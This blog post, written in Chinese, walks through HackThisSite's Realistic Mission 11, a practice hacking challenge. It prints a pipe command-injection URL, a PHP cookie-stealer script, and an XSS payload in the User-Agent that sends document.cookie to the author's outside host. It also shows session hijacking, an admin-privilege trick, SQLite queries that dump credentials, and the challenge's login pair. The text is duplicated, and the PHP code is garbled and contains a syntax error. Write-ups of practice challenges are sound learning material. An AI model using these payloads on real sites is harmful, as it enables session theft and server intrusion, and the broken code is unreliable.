这关就像描述的那样,harder,。。确实很难,我一点都没有自己做,看答案还琢磨了好几天。。。。
参考文章: www.hackthissite.org/articles/read/980/ 这哥们文章确实好,也提醒了我告诉大家一句,如果想自己做的话,看他的文章,我的直接告诉答案
http://www.criticalsecurity.net/index.php/topic/7137-how-to-make-a-cookie-stealer/ 这个将的用php获取网站的cookie,后边会用到,感觉这是混hts到现在最实用的技术
好了,下面正题:
进入网站发现一切正常,没有什么特别的地方,注入也不好使,不过看到地址栏发现 http://www.hackthissite.org/missions/realistic/11/page.pl?page=features,机会来了,这里他用的Perl,将网址改成 http://www.hackthissite.org/missions/realistic/11/page.pl?page=|ls| 这里具体我也没弄明白,只知道pipe(|)是终止当前命令执行下边命令,所以程序执行编程了列出所有文件
admin bs.dbase client_http_docs 发现3个特别的。一个管理员登陆,一个数据库文件还有一个网站客户的路径
进入 http://www.hackthissite.org/missions/realistic/11/client_http_docs/therightwayradio/?page=main 他告诉说有个脚本可以显示登录的用户的客户端,并且以html显示,机会来了
分别编写php脚本stealer.php
并在你的web host(我也不清楚这个翻译成什么更好)里边新建一个叫cookielog.txt的文件
然后需要user agent switcher(火狐浏览器,我不知道其他浏览器有没有换客户端信息的工具,不过应该是肯定能换<不排除ie需要改注册表>)
将User Agent 改成Stealer<script language="JavaScript">document.location=" http://ftded.freehostnow.org/stealer.php?cookie=" + document.cookie;</script>
location的网址写成你自己的地方就可以了,没有写这个也行,我记得我的好像是30天试用的。。。。
之后进入cookielog.txt查看, http://ftded.freehostnow.org/cookielog.txt 我的地址是这个,对了,建这个文件的时候别忘了注意权限啊,要不你自己的php脚本没法改这个txt就惨了
查看txt,发现有个rw_session,把它复制,写到你的cookie中,刷新,好了,登录框没有了,代表你已经登录了,点个人信息,看看自己的信息,发现自己有id,但是没法改,还可以上传图片,可以改密码。
现在要做的工作室获取管理员权限,这样才能做我们想要的事,可是怎么弄呢?上传图片这里图片参数写法帮了我们的忙这里这么写 ?page=admin&add_mod= 后边加上你的id提交,ok你变成管理员了。。。(别问我这个网址那里来,我唯一能说的就只有在刚才查看用户登录信息的html里面有这个网址。。。也许第一个人就这么纯猜出来的吧)
好了现在有管理员面板了,里面发现有个数据库的查询栏,查看源码,注入,吧他要查的数据改成http://www.cnblogs.com/bs.dbase
select name from sqlite_master where type='table' order by name
select * from web_hosting
这下好了,有用户名密码了,进入 http://www.hackthissite.org/missions/realistic/11/client_http_docs/admin/ wonderdiet suckereveryminute 登录
之后,直接
http://www.hackthissite.org/missions/realistic/11/admin/d.pl?file=/var/www/budgetserv/html/client_http_docs/space46/src.tar.gz
本来应该是搞定了,可是我就是这步被stuck了,一直告诉说没权限,不管是注入还是直接下载都不好使。不过也只能这样了,我试好几天了,如果大家这里解决了,希望给留个言告诉下
参考文章: www.hackthissite.org/articles/read/980/ 这哥们文章确实好,也提醒了我告诉大家一句,如果想自己做的话,看他的文章,我的直接告诉答案
http://www.criticalsecurity.net/index.php/topic/7137-how-to-make-a-cookie-stealer/ 这个将的用php获取网站的cookie,后边会用到,感觉这是混hts到现在最实用的技术
好了,下面正题:
进入网站发现一切正常,没有什么特别的地方,注入也不好使,不过看到地址栏发现 http://www.hackthissite.org/missions/realistic/11/page.pl?page=features,机会来了,这里他用的Perl,将网址改成 http://www.hackthissite.org/missions/realistic/11/page.pl?page=|ls| 这里具体我也没弄明白,只知道pipe(|)是终止当前命令执行下边命令,所以程序执行编程了列出所有文件
admin bs.dbase client_http_docs 发现3个特别的。一个管理员登陆,一个数据库文件还有一个网站客户的路径
进入 http://www.hackthissite.org/missions/realistic/11/client_http_docs/therightwayradio/?page=main 他告诉说有个脚本可以显示登录的用户的客户端,并且以html显示,机会来了
分别编写php脚本stealer.php
1
<?
php
2
$cookie
=
$HTTP_GET_VARS
[
*
cookie
"
];
3
$file
=fopen('cookielog.txt','a');
4fwrite(
$file
,
$cookie
.
"
\n\n
"
);
5?>
<?
php2
$cookie
=
$HTTP_GET_VARS
[
*
cookie
"
];3
$file
=fopen('cookielog.txt','a');4
fwrite(
$file
,
$cookie
.
"
\n\n
"
);5
?>
并在你的web host(我也不清楚这个翻译成什么更好)里边新建一个叫cookielog.txt的文件
然后需要user agent switcher(火狐浏览器,我不知道其他浏览器有没有换客户端信息的工具,不过应该是肯定能换<不排除ie需要改注册表>)
将User Agent 改成Stealer<script language="JavaScript">document.location=" http://ftded.freehostnow.org/stealer.php?cookie=" + document.cookie;</script>
location的网址写成你自己的地方就可以了,没有写这个也行,我记得我的好像是30天试用的。。。。
之后进入cookielog.txt查看, http://ftded.freehostnow.org/cookielog.txt 我的地址是这个,对了,建这个文件的时候别忘了注意权限啊,要不你自己的php脚本没法改这个txt就惨了
查看txt,发现有个rw_session,把它复制,写到你的cookie中,刷新,好了,登录框没有了,代表你已经登录了,点个人信息,看看自己的信息,发现自己有id,但是没法改,还可以上传图片,可以改密码。
现在要做的工作室获取管理员权限,这样才能做我们想要的事,可是怎么弄呢?上传图片这里图片参数写法帮了我们的忙这里这么写 ?page=admin&add_mod= 后边加上你的id提交,ok你变成管理员了。。。(别问我这个网址那里来,我唯一能说的就只有在刚才查看用户登录信息的html里面有这个网址。。。也许第一个人就这么纯猜出来的吧)
好了现在有管理员面板了,里面发现有个数据库的查询栏,查看源码,注入,吧他要查的数据改成http://www.cnblogs.com/bs.dbase
select name from sqlite_master where type='table' order by name
select * from web_hosting
这下好了,有用户名密码了,进入 http://www.hackthissite.org/missions/realistic/11/client_http_docs/admin/ wonderdiet suckereveryminute 登录
之后,直接
http://www.hackthissite.org/missions/realistic/11/admin/d.pl?file=/var/www/budgetserv/html/client_http_docs/space46/src.tar.gz
本来应该是搞定了,可是我就是这步被stuck了,一直告诉说没权限,不管是注入还是直接下载都不好使。不过也只能这样了,我试好几天了,如果大家这里解决了,希望给留个言告诉下
扫一扫
2063
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
